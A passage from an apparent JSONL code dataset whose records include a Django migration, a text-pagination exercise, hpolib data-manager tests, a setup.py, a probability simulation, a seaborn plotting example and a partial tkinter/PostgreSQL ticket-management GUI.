models.ForeignKey(blank=True, to='backend.EnergyUnit', 
null=True)),\n ],\n options={\n 'verbose_name_plural': 'Daily Optimizer Tasks',\n },\n ),\n migrations.CreateModel(\n name='Interval',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ],\n ),\n migrations.CreateModel(\n name='OptimizerTask',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('is_active', models.BooleanField(default=True)),\n ('config_json', models.TextField(null=True, blank=True)),\n ('context_json', models.TextField(null=True, blank=True)),\n ('created', models.DateTimeField(auto_now_add=True, null=True)),\n ('last_scheduled_on', models.DateTimeField(null=True, blank=True)),\n ('crontab', models.ForeignKey(blank=True, to='djcelery.CrontabSchedule', null=True)),\n ('eu_id', models.ForeignKey(blank=True, to='backend.EnergyUnit', null=True)),\n ('interval', models.ForeignKey(blank=True, to='optimizer.Interval', null=True)),\n ],\n ),\n migrations.CreateModel(\n name='OptimizerType',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=45)),\n ],\n ),\n migrations.CreateModel(\n name='Priority',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=45)),\n ],\n ),\n migrations.CreateModel(\n name='Recommendation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.TextField(default=None, max_length=256, null=True, blank=True)),\n ('description', models.TextField(default=None, max_length=5000, null=True, blank=True)),\n ('saving_potential', models.CharField(default=None, max_length=254, null=True, blank=True)),\n ('energy_saved', models.CharField(default=None, max_length=254, null=True, blank=True)),\n ('sub_category', models.IntegerField(default=0, null=True, verbose_name=b'sub-category', blank=True)),\n ('date_of_creation', models.DateField(auto_now_add=True, null=True)),\n ('date_of_complete', models.DateField(default=None, null=True, blank=True)),\n ('date_of_completion', models.DateField(default=None, null=True, blank=True)),\n ],\n options={\n 'verbose_name_plural': 'Recommendations',\n },\n ),\n migrations.CreateModel(\n name='RecommendationCategory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=45)),\n ],\n options={\n 'verbose_name_plural': 'Recommendation Categories',\n },\n ),\n migrations.CreateModel(\n name='RecommendationComplexity',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=45)),\n ],\n options={\n 'verbose_name_plural': 'Recommendation Complexities',\n },\n ),\n migrations.CreateModel(\n name='RecommendationPayback',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=45)),\n ],\n options={\n 'verbose_name_plural': 'Recommendation PaybackTime',\n },\n ),\n migrations.CreateModel(\n name='RecommendationStatus',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=45)),\n ],\n options={\n 'verbose_name_plural': 'Recommendation Statuses',\n },\n ),\n 
migrations.CreateModel(\n name='RecommendationStatusLog',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date_of_change', models.DateField(auto_now_add=True, null=True)),\n ('changed_by', models.ForeignKey(default=None, blank=True, to=settings.AUTH_USER_MODEL, null=True)),\n ('new_status', models.ForeignKey(related_name='new_status', default=None, blank=True, to='optimizer.RecommendationStatus', null=True)),\n ('old_status', models.ForeignKey(related_name='old_status', default=None, blank=True, to='optimizer.RecommendationStatus', null=True)),\n ('recommendation', models.ForeignKey(default=None, blank=True, to='optimizer.Recommendation', null=True)),\n ],\n options={\n 'verbose_name_plural': 'Recommendation Status Log',\n },\n ),\n migrations.CreateModel(\n name='TimePeriod',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('time_period', models.CharField(max_length=45, null=True, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Value',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('time_value', models.IntegerField(null=True, blank=True)),\n ],\n ),\n migrations.AddField(\n model_name='recommendation',\n name='category',\n field=models.ForeignKey(default=None, blank=True, to='optimizer.RecommendationCategory', null=True),\n ),\n migrations.AddField(\n model_name='recommendation',\n name='complexity',\n field=models.ForeignKey(default=None, blank=True, to='optimizer.RecommendationComplexity', null=True),\n ),\n migrations.AddField(\n model_name='recommendation',\n name='energy_unit',\n field=models.ForeignKey(default=None, blank=True, to='backend.EnergyUnit', null=True),\n ),\n migrations.AddField(\n model_name='recommendation',\n name='paybacktime',\n field=models.ForeignKey(default=None, blank=True, to='optimizer.RecommendationPayback', null=True),\n ),\n migrations.AddField(\n model_name='recommendation',\n name='status',\n field=models.ForeignKey(default=None, blank=True, to='optimizer.RecommendationStatus', null=True),\n ),\n migrations.AddField(\n model_name='optimizertask',\n name='optimizertype',\n field=models.ForeignKey(to='optimizer.OptimizerType'),\n ),\n migrations.AddField(\n model_name='optimizertask',\n name='priority',\n field=models.ForeignKey(default=None, blank=True, to='optimizer.Priority', null=True),\n ),\n migrations.AddField(\n model_name='optimizertask',\n name='task',\n field=models.ForeignKey(blank=True, to='djcelery.PeriodicTask', null=True),\n ),\n migrations.AddField(\n model_name='interval',\n name='time_period',\n field=models.ForeignKey(blank=True, to='optimizer.TimePeriod', null=True),\n ),\n migrations.AddField(\n model_name='interval',\n name='time_value',\n field=models.ForeignKey(blank=True, to='optimizer.Value', null=True),\n ),\n migrations.AddField(\n model_name='dailyoptimizertask',\n name='priority',\n field=models.ForeignKey(default=None, blank=True, to='optimizer.Priority', null=True),\n ),\n ]\n","sub_path":"optimizer/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":9969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"166876140","text":"# 9.16. 
Program to generate a paginated file\n\nLARGURA = 76\nLINHAS = 60\nNOME_DO_ARQUIVO = \"mobydick.txt\"\n\n\ndef verificaPagina(arquivo, linha, pagina):\n    if linha == LINHAS:\n        rodape = f\"= {NOME_DO_ARQUIVO} - Página: {pagina} =\"\n        arquivo.write(rodape.center(LARGURA - 1) + \"\\n\")\n        pagina += 1\n        linha = 1\n    return linha, pagina\n\n\ndef escreve(arquivo, linha, nLinhas, pagina):\n    arquivo.write(linha + \"\\n\")\n    return verificaPagina(arquivo, nLinhas + 1, pagina)\n\n\nentrada = open(NOME_DO_ARQUIVO, encoding=\"utf-8\")\nsaida = open(\"saida_paginada.txt\", \"w\", encoding=\"utf-8\")\n\npagina = 1\nlinhas = 1\n\nfor linha in entrada.readlines():\n    palavras = linha.rstrip().split(\" \")\n    linha = \"\"\n    for p in palavras:\n        p = p.strip()\n        if len(linha) + len(p) + 1 > LARGURA:\n            linhas, pagina = escreve(saida, linha, linhas, pagina)\n            linha = \" \"\n        linha += p + \" \"\n    if linha != \"\":\n        linhas, pagina = escreve(saida, linha, linhas, pagina)\n\nwhile(linhas != 1):\n    linhas, pagina = escreve(saida, \"\", linhas, pagina)\n\n\nentrada.close()\nsaida.close()\n","sub_path":"pythonBook/chapter09/exercise9-16.py","file_name":"exercise9-16.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"574386610","text":"import pytest\nimport hpolib\nfrom hpolib.util.data_manager import NASBench_201Data\nimport shutil\nfrom multiprocessing import Pool\n\n\ndef _load_nasbench_201(_):\n    # Module-level helper so multiprocessing.Pool can pickle it for the workers.\n    return NASBench_201Data(dataset='cifar100').load()\n\n\ndef test_nasbench_201_load_thread_safe():\n    shutil.rmtree(hpolib.config_file.data_dir / \"nasbench_201\", ignore_errors=True)\n    # Map over a non-empty iterable so the load actually runs concurrently;\n    # mapping over [] would never invoke the callable at all.\n    with Pool(3) as pool:\n        pool.map(_load_nasbench_201, range(3))\n\n\ndef test_nasbench_201_get_files():\n\n    files = NASBench_201Data.get_files_per_dataset(dataset='cifar10')\n    assert len(files) == 18\n    assert all([file.startswith('nb201_cifar10') for file in files])\n\n\ndef test_nasbench_201_get_metrics():\n\n    metrics = NASBench_201Data.get_metrics()\n    assert metrics == ['train_acc1es', 'train_losses', 'train_times',\n                       'eval_acc1es', 'eval_times', 'eval_losses']\n\n\ndef test_nasbench_201_init():\n\n    data_manager = NASBench_201Data(dataset='cifar100')\n    assert len(data_manager.files) == 18\n    assert all([file.startswith('nb201_cifar10') for file in data_manager.files])\n\n    with pytest.raises(AssertionError):\n        NASBench_201Data(dataset='Non_existing_dataset')\n\n    assert data_manager._save_dir == hpolib.config_file.data_dir / \"nasbench_201\"\n    assert data_manager._save_dir.exists()\n\n\ndef test_nasbench_201_load():\n\n    shutil.rmtree(hpolib.config_file.data_dir / \"nasbench_201\", ignore_errors=True)\n\n    data_manager = NASBench_201Data(dataset='cifar100')\n    data = data_manager.load()\n\n    assert len(data) == len(list(NASBench_201Data.get_seeds_metrics()))\n    assert len(data) == 3 * len(NASBench_201Data.get_metrics())\n    assert (hpolib.config_file.data_dir / \"nasbench_201\").exists()\n    assert len(list((hpolib.config_file.data_dir / \"nasbench_201\" / \"data\").glob('*.pkl'))) == 72\n    assert not (hpolib.config_file.data_dir / \"nasbench_201_data_v1.1.zip\").exists()\n\n    data_manager.data = None\n\n    data_manager = NASBench_201Data(dataset='cifar100')\n    data = data_manager.load()\n    assert len(data) == 3 * len(NASBench_201Data.get_metrics())\n","sub_path":"tests/test_data_manager.py","file_name":"test_data_manager.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"616977599","text":"\nimport 
os\n\nimport setuptools\nfrom setuptools import setup\n\nfrom textwrap import dedent\n\n\n__version__ = '1.0.44'\n__release__ = '$release 37'\n\nlong_description = 'https://github.com/michael-ross-ven/vengeance/blob/master/README.md (fill this out for pypi.org later)'\n\n\nif __name__ == '__main__':\n    setup(name='vengeance',\n          version=__version__,\n          description='Library focusing on row-major organization of tabular data and control over the Excel application',\n          long_description=long_description,\n          url='https://github.com/michael-ross-ven/vengeance',\n          author='Michael Ross',\n          author_email='',\n          license='MIT',\n          install_requires=('comtypes', 'pypiwin32'),\n          # setuptools expects extras_require to be a mapping of group name to\n          # requirements; the group name 'extras' here is illustrative.\n          extras_require={'extras': ['numpy', 'python-dateutil', 'ujson', 'line-profiler']},\n          packages=setuptools.find_packages(),\n          classifiers=[\n              \"Programming Language :: Python :: 3\",\n              \"License :: OSI Approved :: MIT License\",\n              \"Operating System :: Microsoft :: Windows\"\n          ]\n\n          )\n","sub_path":"pypi_install_script/vengeance-1.0.44.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"640208493","text":"#Riddler Challenge 11.18.16\n#\n#Logan Noel\n\n\nimport random\nimport matplotlib\nfrom collections import Counter\nimport math\nimport numpy\nimport pylab\nimport time\n\ndef one_game(population):\n    while population != 0:\n        #print(population)\n        people = [True] * population\n        #print(people)\n        for person in people:\n            people[random.randint(0, population - 1)] = False\n        people = [i for i in people if i is True]\n        population = len(people)\n        if population == 1:\n            return True\n    return False\n\ndef many_games(lower, upper, cycles, step = 1):\n    rv = []\n    x_rv = []\n    for n in range(lower, upper + 1, step):\n        x_rv.append(n)\n        true_rate = 0\n        for i in range(cycles):  # exactly 'cycles' trials, matching the divisor below\n            if one_game(n):\n                true_rate += 1\n        hit_percentage = float(true_rate / cycles)\n        rv.append(hit_percentage)\n    return rv, x_rv\n\ndef plot_whatever(title,xlabel,ylabel,x_axis,y_axis):\n    '''\n    Plot a function given points & labels\n    ''' \n    # plot the figure\n    pylab.figure()\n    pylab.plot(x_axis,y_axis)\n    pylab.title(title)\n    pylab.xlabel(xlabel)\n    pylab.ylabel(ylabel)\n    pylab.show()\n\ndef do_sim(lower, upper, cycles, step):\n    begin_time = time.time()\n    y, x = many_games(lower, upper, cycles, step)\n    end_time = time.time()\n    print(end_time - begin_time, \"seconds have elapsed\")\n    plot_whatever(\"The Lonesome King\", \"Citizens\", \"Chance a winner is crowned\",\n                 x, y)\n    \n    \n","sub_path":"riddler11_18.py","file_name":"riddler11_18.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"508424456","text":"#Factorplot draws a categorical plot on a FacetGrid. Using ‘kind’ parameter we\n#can choose the plot like boxplot, violinplot, barplot and stripplot. 
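\n#Aside, assuming seaborn 0.9+: factorplot was renamed catplot with the same\n#signature, so the first call below could equally be written as\n#  sb.catplot(x = \"time\", y = \"pulse\", hue = \"kind\", data = df)\n#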
FacetGrid uses pointplot by default.\n\nimport pandas as pd\nimport seaborn as sb\nfrom matplotlib import pyplot as plt\ndf = sb.load_dataset('exercise')\nsb.factorplot(x = \"time\", y = \"pulse\", hue = \"kind\",data = df);\nplt.show()\n\n\nprint('if you want to plot it as a violin')\ndf1 = sb.load_dataset('exercise')\nsb.factorplot(x = \"time\", y = \"pulse\", hue = \"kind\",kind=\"violin\",data = df1);\nplt.show()\n","sub_path":"factorplot.py","file_name":"factorplot.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"526201973","text":"\"\"\"Interfaz gráfica para la base de datos controltickets. \n    Versión:040621 con respecto a la primera versión:140321.\n260521E-1: fue la primera versión encapsulada básica totalmente funcional mínimamente.\n020621: presenta por primera vez una función dlookup totalmente completa, no parcial.\n270621: prueba con git-github\"\"\"\n\nimport psycopg2\nfrom datetime import datetime\nfrom tkinter import *\nfrom tkinter import ttk\nfrom tksheet import *\nfrom tkinter import messagebox\nfrom LógicaEmpresarial import * \nconexión = None\n\ntry:\n    raíz = Tk()\n    conexión = psycopg2.connect(**infoConex)\n\n    class GeometríaBase:\n        \"Haremos la clase plantilla, con los atributos comunes a las instancias.\"\n        def __init__(self, argroot, argconnect, argtipoVentana):\n            # Primero, definimos los atributos comunes en todas las instancias que se produzcan con esta clase GeometríaBase (que será el común en todas las ventanas que se instancien con esta clase):\n            # Definición de variables comunes de control tkinter enlazadas a sus respectivos widgets:\n            # Me permite visibilizar la conexión argconnect en todos los miembros de la clase (atributos-métodos y otros).\n            self.conexiónParaTodaLaClase = argconnect\n            # Enlazada a self.txtBoxFecha (textvariable = self.fecha).\n            self.fecha = StringVar()\n            # Variable entera que guarda la posición actual en la lista TodosLosNoConsig igual al no_consig. 
Se puede obviar y usar directamente los métodos .set y .get de la variable de control, pero para evitar esto y hacer el código más eficiente, usamos esta variable-miembro de clase.\n self.posición = 0\n # Variable de control tkinter para el valor del registro de acceso directo.\n self.Ir_a = IntVar(value=1)\n # Variable de control para los subtotales de los tickets Cartón, que es común para las ventanas que se usarán.\n self.SubTotalTicketsCartón = DoubleVar()\n # Enlazada a self.txtBoxIdCliente (textvariable = self.idCliente)\n self.idCliente = StringVar()\n # Su widget estará invisibilizado hasta que se llame a una actualización o inserción de un nuevo registro.\n self.idClienteComboBox = StringVar()\n #tipoOperación guardará la constante simbólica en forma de cadena del tipo de operación que se invocó según el botón de operación pulsado:\n self.tipoDeOperación = None\n self.tipoVentana = argtipoVentana\n self.ventanaParaTodaLaClase = argroot\n\n # Definición de los widgets comunes:\n # Definimos los cuatro cuerpos principales comunes que conforman la ventana:\n # Creamos el frame común \"self.mainframe1\" para colocar los widgets con los datos de los widgets particulares de tipoVentana:\n self.mainframe1 = ttk.Frame(self.ventanaParaTodaLaClase)\n # En la columna y fila 0 de argroot.\n self.mainframe1.grid(column=0, row=1, sticky=(N, W, E, S))\n\n # Creamos el widget común tipo frame identificado como self.mainframe2 que estará en la mitad vertical de la interfaz y servirá para meter las hojas tksheet para visulizar los tickets:\n self.mainframe2 = ttk.Frame(self.ventanaParaTodaLaClase)\n # En la columna 0 y fila 1 de argroot (mitad vertical).\n self.mainframe2.grid(column=0, row=2)\n\n # El frame común inferior, el que colocamos debajo self.mainframe2, para colocar los botones de navegación:\n # Fijamos la altura en 20 pixeles.\n self.mainframe3 = ttk.Frame(self.ventanaParaTodaLaClase, height=20)\n self.mainframe3.grid(column=0, row=3, sticky=(N, W, E, S))\n\n # Definimos un cuarto cuerpo o subframe llamada self.mainframe4, y lo metemos dentro de self.mainframe2, al lado de los tk sheet que estarán metidos dentro de un cuaderno (consignación) o canvas (división de tickets), para meter los widgets de los montos parciales de los tickets con su uso de la función agregada sum:\n self.mainframe4 = ttk.Frame(self.mainframe2)\n self.mainframe4.grid(column=1, row=0)\n\n # Creamos un subframe a parte para los botones de operaciones (actualizar, confirmar, eliminar), self.mainframe5. No pueden ir en mainframe3 porque me deforma los botones que van a encima de ellos (nuevo, confirmar, abortar in), porque compartirían columnas:\n # 20 pixeles es la altura que estamos usando para las filas.\n self.mainframe5 = ttk.Frame(self.ventanaParaTodaLaClase, height=20)\n self.mainframe5.grid(row=4, sticky=NSEW, column=0)\n \n # Tenemos dos widgets comunes para mainframe1 para los casos de consignación y división de tickets: fecha e idCliente. De modo que los colocamos. 
La fecha la pondremos en la primera fila, segunda columna, e idcliente lo pondremos en la segunda fila, primera columna:\n # Widgets para el campo o columna Fecha:\n ttk.Label(self.mainframe1, text=\"FECHA\").grid(\n column=3, row=1, sticky=NSEW)\n self.txtBoxFecha = ttk.Entry(\n self.mainframe1, width=9, textvariable=self.fecha)\n self.txtBoxFecha.grid(column=4, row=1, sticky=NSEW)\n self.txtBoxFecha['state'] = \"readonly\"\n\n # Widgets para el campo o columna IdCLIENTE:\n ttk.Label(self.mainframe1, text=\"IdCLIENTE\").grid(\n column=1, row=2, sticky=NSEW)\n self.txtBoxIdCliente = ttk.Entry(\n self.mainframe1, width=6, textvariable=self.idCliente)\n self.txtBoxIdCliente.grid(column=2, row=2, sticky=NSEW)\n self.txtBoxIdCliente['state'] = 'readonly'\n\n # El widget común combobox que se visualizará eventualmente para el campo o columna IdCLIENTE cuando se vaya a actualizar o a ingresar nuevos registros:\n # textvariable se actualizará automáticamente con el valor seleccionado en el combobox (genera un evento virtual <>, cada vez que se selecciona un valor de su lista de valores value, o se introduce un texto en el caso de que se use como combinación entry y listbox.\n self.comboBoxIdCliente = ttk.Combobox(\n self.mainframe1, width=6, textvariable=self.idClienteComboBox)\n self.comboBoxIdCliente.grid(column=2, row=2, sticky=NSEW)\n self.comboBoxIdCliente['state'] = 'readonly'\n self.comboBoxIdCliente.grid_remove() # Le aplicamos grid_remove: método que lo invisibiliza (el widget existe, está todo el tiempo en mainframe1 pero oculto) y que con grid(), lo volvemos a visibilizar con todos los valores originales en sus atributos. Su estado normal será estar invisible, porque para navegar por los registros, usaremos txtBoxIdCliente para visualizar idCliente.\n\n # Todos los botones son comunes a los tipos de ventana que se instanciaran, así que ponemos los botones en sus mainframe correspondientes, self.mainframe3 y self.mainframe5, en esta clase GeometríaBase:\n # Colocamos los botones de navegación sobre las consignaciones dentro de self.mainframe3. Como podemos repasar, en los parámetros con nombre, no importa su posición.\n # Usaremos funciones anónimas (lambda) para poder pasar el parámetro \"tipoAcción\" al método referido, porque usaremos un sólo método para todos los botones de navegación, en plan de racionalizar el código.\n # Los crearemos como atributos de la clase (self.) 
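\n            # Sketch of the lambda-command pattern just described (one handler,\n            # parametrized per button):\n            #   ttk.Button(f, command=lambda: self.BotónPulsado(\"primero\"))\n            #   # ...and BotónPulsado(self, *args) then receives args == (\"primero\",)\n            # 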
porque serán manipulados desde atributos-métodos de esta misma clase:\n self.botónPrimer = ttk.Button(\n self.mainframe3, command=lambda: self.BotónPulsado(\"primero\"), text=\"<<\", width=3)\n self.botónPrimer.grid(column=0, row=1, sticky=NSEW)\n self.botónRetro = ttk.Button(\n self.mainframe3, text=\"<\", width=2, command=lambda: self.BotónPulsado(\"retroceso\"))\n self.botónRetro.grid(column=1, row=1, sticky=NSEW)\n self.botónAvance = ttk.Button(\n self.mainframe3, width=2, command=lambda: self.BotónPulsado(\"avance\"), text=\">\")\n self.botónAvance.grid(column=2, row=1, sticky=NSEW)\n self.botónUltimo = ttk.Button(\n self.mainframe3, text=\">>\", command=lambda: self.BotónPulsado(\"último\"), width=3)\n self.botónUltimo.grid(column=3, row=1, sticky=NSEW)\n self.botónIrA = ttk.Button(self.mainframe3, text=\"Ir a:\",\n command=lambda: self.BotónPulsado(\"ir_a\"), width=3)\n self.botónIrA.grid(column=4, row=1, sticky=NSEW)\n\n # Como este cuadro de texto no se manipula, no se declara como miembro-atributo de la clase (self.):\n ttk.Entry(self.mainframe3, width=3,\n textvariable=self.Ir_a).grid(column=5, row=1)\n\n # Creamos los botones de acción de insertar nuevos registros, modificar y eliminar. Como estos botones\n # invocan métodos específicos de ingreso o deshabilitaciones, no usan funciones anónimas lambda, si no que refieren a procedimientos normales:\n self.botónNuevoRegis = ttk.Button(\n self.mainframe3, text=\"Nuevo\", command=lambda: self.BotónPulsado(\"nuevo\"), width=5)\n self.botónNuevoRegis.grid(column=6, row=1, sticky=NSEW)\n #Recuerde que la invocación del método convencional para command no lleva paréntesis:\n self.botónIngresar = ttk.Button(\n self.mainframe3, text=\"Confirm\", command=self.Insertar, width=7, state=DISABLED) \n self.botónIngresar.grid(column=7, row=1, sticky=NSEW)\n \n # Metemos los botones de actualización y eliminación en mainframe5:\n self.botónUpdate = ttk.Button(\n self.mainframe5, text=\"Actualizar\", command=lambda: self.BotónPulsado(\"actualización\"), width=9)\n self.botónUpdate.grid(column=1, row=1, sticky=NSEW)\n self.botónEliminar = ttk.Button(\n self.mainframe5, text='Eliminar', command=self.Eliminar, width=7)\n self.botónEliminar.grid(column=3, row=1, sticky=NSEW)\n # Su estado normal es deshabilitado:\n self.botónConfirmUpDate = ttk.Button(\n self.mainframe5, text='ConfirmUpDate', command=self.Actualizar, width=14, state=DISABLED) \n self.botónConfirmUpDate.grid(column=2, row=1, sticky=NSEW)\n\n # Ahora, filtramos según tipo ventana con que instanciamos a GeometríaBase, para definir los widgets y las variables de control específicas, no comunes, del tipoVentana:\n if self.tipoVentana == \"principal\":\n # Variables de control específicas para tipo de ventana consignación:\n self.ventanaParaTodaLaClase.title(\"CONSIGNACIÓN\")\n # Hacemos una lista con todos los valores no_consignación de la tabla consignación. Retornará una lista de listas de un solo elemento de\n # la forma [[1], [2], ...[último no_consig]] que debe convertirse a lista sencilla [1, 2, ...último no_consig] con la función ConversorListaSencilla:\n self.todosLosNo_Consigna = conversorListaSencilla(ResultadoConsulta(\n self.conexiónParaTodaLaClase, \"select no_consignación from consignación order by no_consignación asc\"))\n \n # Enlazada a self.txtBoxNoCONSIG (textvariable = self.no_consig). 
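\n                # Control-variable binding sketch: an Entry mirrors its variable\n                # in both directions, e.g.\n                #   v = IntVar(); e = ttk.Entry(frame, textvariable=v)\n                #   v.set(3)    # the widget now shows \"3\"\n                #   v.get()     # returns the current widget content as an int\n                # 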
Inicializamos con el registro de la primera posición:\n self.no_consig = IntVar()\n # Enlazada a self.txtBoxEntregó (textvariable = self.entregó):\n self.entregó = StringVar()\n self.SubTotalTicketsBanco1 = DoubleVar()\n self.TotalTickets = DoubleVar()\n self.TotalTicketsPorcent = DoubleVar()\n \n # Segunda Parte: creación de los widgets y su colocación dentro de la interfaz:\n # Creamos el widget de barra de menú en la interfaz que se situará por defecto en la parte superior, independientemente de los frame que se introduzcan en la raíz tksheet originaria:\n self.barraMenú = Menu(self.ventanaParaTodaLaClase)\n # Con la opción de configuración menu del widget dónde irá el menú (que la interfaz raíz), visibilizamos el menú: es remotamente equivalente al grid.\n # La propiedad menu del widget, en este caso la interfaz raíz, tendrá como valor el menú que instanciamos sobre el, y que apuntamos con el identificador barraMenú.\n self.ventanaParaTodaLaClase['menu'] = self.barraMenú\n\n # Agregamos los menú a la barra de menú que creamos con el identificador barraMenú:\n # Para aspecto moderno y no desacoplable de los menú, antes de crear cualquiera de ellos, colocamos esta proposición:\n self.ventanaParaTodaLaClase.option_add('*tearOff', FALSE)\n # Creamos el primer menú contenido en barraMenú, apuntado por el identificador operarTablas:\n self.operarTablas = Menu(self.barraMenú)\n # Creamos otro menú que ya veremos que le agregamos. Puede ser versión, ayuda, acerca de, etc.\n self.otrasOperaciones = Menu(self.barraMenú)\n # Agregamos los menú creado en la barra de menú barraMenú.\n self.barraMenú.add_cascade(\n label=\"TABLA\", menu=self.operarTablas)\n self.barraMenú.add_cascade(\n label=\"OTRAS\", menu=self.otrasOperaciones)\n\n # Agregamos los comandos a los menús:\n # Tiene que ser una función-atributo-método convencional porque implica dos proposiciones.\n self.operarTablas.add_command(\n label=\"Divisiones Hechas\", command=self.EmergenteDivisionesHechas)\n # lambda: GeometríaVentanaTicketCarGenerados(argroot, self.conexiónParaTodaLaClase))\n self.operarTablas.add_command(\n label=\"Tickets Cartón Generados\", command=\"\")\n self.otrasOperaciones.add_command(\n command=\"\", label=\"Comando x\")\n self.otrasOperaciones.add_command(label=\"Comando z\")\n\n # Widgets para el campo o columna Consignación de la base de datos controltickets:\n ttk.Label(self.mainframe1, text=\"NoCONSGINACIÓN\").grid(\n column=1, row=1, sticky=NSEW)\n # Lo creamos deshabilitado. Como está deshabilitado, no se podrá apreciar el estilo.\n self.txtBoxNoCONSIG = ttk.Entry(\n self.mainframe1, width=3, textvariable=self.no_consig, state=DISABLED, style=\"estiloE1.TEntry\")\n self.txtBoxNoCONSIG.grid(column=2, row=1, sticky=NSEW)\n # self.txtBoxNoCONSIG['state']=\"enabled\" #Y con esta proposición la habilitamos. El atributo state de esta clase tiene una lista de tres posibles valores: enabled, disabled y readonly. Fijese que podemos creal el widget con su condición inicial, o asignarla luego, como aquí.\n\n # Widgets para el campo o columna Entregó:\n ttk.Label(self.mainframe1, text=\"ENTREGÓ\").grid(\n column=3, row=2, sticky=NSEW)\n self.txtBoxEntregó = ttk.Entry(\n self.mainframe1, width=9, textvariable=self.entregó)\n self.txtBoxEntregó.grid(column=4, row=2, sticky=NSEW)\n self.txtBoxEntregó['state'] = 'readonly'\n\n # Y metemos el cuaderno (sin pestañas aún) dentro de self.mainframe2. 
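\n                # ttk.Notebook in a nutshell (sketch): create the container first,\n                # then register each page with add():\n                #   nb = ttk.Notebook(parent); nb.grid()\n                #   nb.add(some_widget, text=\"Tab title\")\n                # 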
Como lo referiremos en otros métodos de la clase, debe ser un miembro de la clase, así que lo declaramos con el calificativo self:\n # Como mainframe2 es de tamaño automático, ajustable a los widgets que se le metan, se pondrá de alto a la altura que se le dió al cuaderno (130):\n self.cuaderno = ttk.Notebook(\n self.mainframe2, height=130, width=200)\n self.cuaderno.grid(column=0, row=0)\n\n # Creamos, instanciamos los objetos hojas de la clase tksheet, que metemos dentro del cuaderno. Como las hojas son objetos gráficos si van a cambiar, modificadas desde métodos miembros de la clase, se declaran como miembros de la clase (.self):\n self.hojaTicketBanco1 = Sheet(\n self.cuaderno, column_width=70, align=\"center\", header_align=\"center\")\n self.hojaTicketCartón = Sheet(\n self.cuaderno, column_width=70, align=\"center\", header_align=\"center\")\n\n # Y así le modificamos el nombre a los encabezados, con el atributo headers de la clase Sheet:\n # Fíjese que el parámetro imprescindible es la tupla de los nuevos nombres de los encabezados. El nombre de parámetro es opcional en esta caso.\n self.hojaTicketBanco1.headers(newheaders=(\"REF\", \"MONTO\"))\n # El uso del nombre del parámetro (newheaders) es prescindible. Fijese que esta vez metimos una lista. Es indiferente usar listas o tuplas para ello, siempre y cuando sea un iterable.\n self.hojaTicketCartón.headers([\"IdCARTÓN\", \"MONTO\"])\n\n # Posicionamos las hojas dentro de cuaderno. Si no específicamos nada, las pondrá una al lado de otra en el orden que fueron creadas:\n self.hojaTicketBanco1.grid()\n self.hojaTicketCartón.grid()\n\n # A vaina loca, metí las hojas de cuaderno al mismo tiempo que las creo agregándolas:\n # Por último metemos las hojas (pestañas) del cuaderno y las apuntamos con identificadores porque las referiremos desde otras partes de programa más tarde:\n self.cuaderno.add(self.hojaTicketBanco1, text='TicketBanco1')\n self.cuaderno.add(self.hojaTicketCartón, text='TicketCartón')\n\n # Ahora metemos los widgets de los montos parciales por tipo de tickes, y total a transferir por porcentaje (no todos se le cobra el mismo porcentaje) dentro de self.mainframe4:\n # Para los tickets de Banco1:\n ttk.Label(self.mainframe4, text=\"SubTotalTicketBanco1:\").grid(\n column=1, row=1, sticky=NSEW)\n self.txtBoxTicketBanco1 = ttk.Entry(\n self.mainframe4, width=10, textvariable=self.SubTotalTicketsBanco1)\n self.txtBoxTicketBanco1.grid(column=1, row=2)\n self.txtBoxTicketBanco1['state'] = \"readonly\"\n\n # Para los tickets cartón:\n ttk.Label(self.mainframe4, text=\"SubTotalTicketCartón:\").grid(\n column=1, row=3, sticky=NSEW)\n self.txtBoxTicketCartón = ttk.Entry(\n self.mainframe4, width=10, textvariable=self.SubTotalTicketsCartón)\n self.txtBoxTicketCartón.grid(column=1, row=4)\n self.txtBoxTicketCartón['state'] = \"readonly\"\n\n # Para el subtotal de todos los tickets:\n ttk.Label(self.mainframe4, text=\"SubTotalTickets:\").grid(\n column=1, row=5, sticky=NSEW)\n self.txtBoxTotalTicket = ttk.Entry(\n self.mainframe4, width=10, textvariable=self.TotalTickets)\n self.txtBoxTotalTicket.grid(column=1, row=6)\n self.txtBoxTotalTicket['state'] = \"readonly\"\n\n # Para el subtotal de todos los tickets menos el porcentaje:\n ttk.Label(self.mainframe4,\n text=\"SubTotalTickets - x%:\").grid(column=1, row=7, 